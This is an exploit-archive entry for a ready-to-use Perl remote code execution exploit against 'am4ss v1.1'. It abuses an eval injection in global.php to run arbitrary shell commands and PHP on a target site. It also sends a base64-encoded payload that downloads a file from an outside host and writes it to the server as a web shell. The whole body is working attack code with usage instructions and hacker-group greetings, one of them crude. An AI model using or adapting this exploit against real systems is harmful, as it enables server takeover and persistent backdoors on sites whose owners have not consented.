am4ss v1.1 Remote Code Execution



EKU-ID: 787 CVE: OSVDB-ID:
Author: Or4nG.M4n Published: 2011-08-05 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/perl -w
# Exploit Title: am4ss v1.1 Remote Code Execution
# Version: 1.1
# Author : Or4nG.M4n & i-Hmx < Dev Exploit
# Big Thnks 2 : i-Hmx , sA^Dev!L
# Big dicks to : Duck lamerz Team :))
# Tested on: Windows 8 
use MIME::Base64;
use LWP::UserAgent;
use LWP::Simple;
# About ..
print q(
   anti.virus.team | Or4nG.M4n | alm3refh.cOm Group
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   in the name of /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
   |  Sp Thnks 2 : sA^Dev!L , i-Hmx , h311 c0d3 , xSs m4n   |
   | Gr33tz : SarBoT511 , Dr.Silv3r , Demetre ,  Lagripe-Dz |
   |  Mr.DH , x-Sh4dow , Pir4t3 ,  b0x , SadhaCker , r00t3r |
   +--------------------------------------------------------+
   | Home :~# 1337s.cc , tryag.cc , sec4ever , r00t-s3c.com |
   +--------------------------------------------------------+
);

# start
if($ARGV[0] =~ "-cm"){ 
$a1 = $ARGV[1];
$a2 = $ARGV[2];
print "
Please select function to use [system , exec , shell_exec]
function# ";
$func =<STDIN>;
for($faris=0;$faris<1000;$faris++)
{
print "
Command# ";
$execut =<STDIN>;
$exec = $func."('".$execut."');";
$cmd = encode_base64($exec);
$ex = $a1 ."\x2F". $a2 ."global.php?fa=". $cmd ."&bn=eval(base64_decode(\$fa));;";
my $content = get $ex;
if(!$content){
}else{
print "\nExecuting cmd ..\n\n";
}
print  $content;
}
}
# End
#injection func
if($ARGV[0] =~ "-ev"){ 
$a1 = $ARGV[1];
$a2 = $ARGV[2];
print "Write PHP code to be executed on the remote site [ don't use <? or ?> ]
Example:phpinfo();";
print "
choose file to dump the results in (eg 1337s.htm)
File name# ";
$myf =<STDIN>;
for($faris=0;$faris<1000;$faris++)
{
print "Eval# ";
$evalcode =<STDIN>;
$evalencoded = encode_base64($evalcode);
$strike = $a1 ."\x2F". $a2 ."global.php?fa=". $evalencoded ."&bn=eval(base64_decode(\$fa));;";
my $content = get $strike;
if(!$content){
}else{
print "\nDumping Results\n\n";
}
open(lst,">>$myf\n");
print lst"$content\n";
close(lst);
}
}
#ended
if($ARGV[0] =~ "-up"){ 
$a1 = $ARGV[1];
$a2 = $ARGV[2];
$ex = $a1."\x2F".$a2."global.php?fa=JGZpbGUgPSBmb3Blbigib3I0bmcucGhwIiAsIncrIik7JHNhPWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vdHJhdjFhbi50MzUuY29tL3I1dC50eHQiKTskd3JpdGUgPSBmd3JpdGUgKCRmaWxlICwkc2EpOw==&bn=eval(base64_decode(\$fa));;";
my $content = get $ex;
print "Exploiter\n";
sleep(4);
print  "done .. > $a1 $a2 > or4ng.php < shell.php Enjoy";
}
if($ARGV[0] =~ ""){
print q(
   anti.virus.team | Or4nG.M4n
                            _      _       _          _      _   _
                           / \    | |     | |        / \    | | | |
                          / _ \   | |     | |       / _ \   | |_| |
                         / ___ \  | |___  | |___   / ___ \  |  _  |
   +-----in the name of /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
   | Upload Shell Use : perl am4ss.pl -up http://localhost/ Path/ |
   | Cmd By Functions : perl am4ss.pl -cm http://localhost/ Path/ |
   | Eval php code    : perl am4ss.pl -ev http://localhost/ Path/ |
   +--------------------------------------------------------------+
);
}
# Coded By Or4nG.M4n ..